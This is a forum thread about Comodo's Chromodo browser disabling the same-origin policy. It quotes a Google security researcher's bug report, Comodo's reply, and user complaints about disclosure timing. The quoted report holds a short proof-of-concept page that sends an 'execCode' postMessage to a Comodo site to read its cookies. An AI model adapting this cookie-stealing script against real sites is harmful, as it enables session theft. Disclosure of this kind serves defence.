I would like to know what our Comodo experts think of the situation. But I can imagine some of them saying something like "Meh. Nothing new. It's just Comodo being Comodo."
When you install Comodo Internet Security, by default a new browser called Chromodo is installed and set as the default browser. Additionally, all shortcuts are replaced with Chromodo links and all settings, cookies, etc are imported from Chrome. They also hijack DNS settings, among other shady practices.
Chromodo Internet Browser
Chromodo is described as "highest levels of speed, security and privacy", but actually disables all web security. Let me repeat that, they ***disable the same origin policy***.... ?!?..
To reproduce, do something like this:
<html>
<head></head>
<body>
<script>
function steal_cookie(obj)
{
// Wait for the page to load
setTimeout(function() {
obj.postMessage(JSON.stringify({
command: "execCode",
code: "alert(document.cookie)",
}), "*");
}, 2000);
}
</script>
<a href="javascript:steal_cookie(window.open('https://ssl.comodo.com/'))">Click Here</a>
</body>
</html>
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Aka "security through stupidity"! I'm eagerly anticipating the results for CIS, if this Chromodo disaster is a sign of things to come it will be a fallout for them.It looks like Comodo pushed a change that removes the "execCode" API that I was using in my exploit.
This is obviously an incorrect fix, and a trivial change makes the vulnerability still exploitable. After "discussion" with Comodo (I can't really get any response from them, but I'm trying), I'll consider this bug fixed and file a new bug with the trivial bypass of their fix as a new issue.
Indeed, that is a rather annoying nagscreen which you can turn off only after CAV has made its first detection. (it would seem that there is no option to directly disable it in COMODO's settings, rather only through the nagscreen)If a threat is detected GeekBuddy pops up!!!!
Dragon does not seem to be affected though. Strange.
it was a google engineer who conducted the test so he/she focused on the chromium based version.
A js code introduced by a non comodo code has caused this issue.
we have removed it and will do a release shortly.
we regret that Google did not follow its own responsible disclosure guideline and put users at risks by releasing this publicly, against their policy of 90 days.
We always care for our users and users come first.
We welcome the extra attention from google since we launched Which Ad Blocker world's most comprehensive adblocking initiative that includes an Android ad blocker (http://www.amazon.com/COMODO-Security-Solution-Ad-Blocker/dp/B01ATW7NC6 )
We invite google, in the interest of user's security, to follow its own published guidelines for responsible disclosure.
******************************
here is the note about Google responsible disclosure guideline, at the foot of the initial bug report, posted 21st Jan...of course its not been 90 days since 21st Jan.
Issue 704 - google-security-research - Comodo: Comodo "Chromodo" Browser disables same origin policy, Effectively turning off web security. - Google Security Research - Google Project Hosting
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Sorry for off-topic - best choices: Avira, Avast, AVG, Qihoo 360 Total Security, F-Secure, ESET, Norton...I've lost hope for Comodo, It was my favorite product since V2. Now, I don't trust them anymore and I don't like the "shady behavior". I will change it in 1-2 weeks (I need to finish some testing to see what will replace CIS). The sad part is that not only Comodo has some "shady behavior", there are more
They apparently love lying...we regret that Google did not follow its own responsible disclosure guideline and put users at risks by releasing this publicly, against their policy of 90 days.
It looks like Comodo pushed a change that removes the "execCode" API that I was using in my exploit.
This is obviously an incorrect fix, and a trivial change makes the vulnerability still exploitable. After "discussion" with Comodo (I can't really get any response from them, but I'm trying), I'll consider this bug fixed and file a new bug with the trivial bypass of their fix as a new issue. Issue 704 - google-security-research - Comodo: Comodo "Chromodo" Browser disables same origin policy, Effectively turning off web security. - Google Security Research - Google Project Hosting
What does that even mean? It's their own project and their "own" codebase, if it wasn't their own code it wouldn't be in the software and since no other Chromium based browser was affected by this I assume they are lying through their teeth.A js code introduced by a non comodo code has caused this issue. we have removed it and will do a release shortly.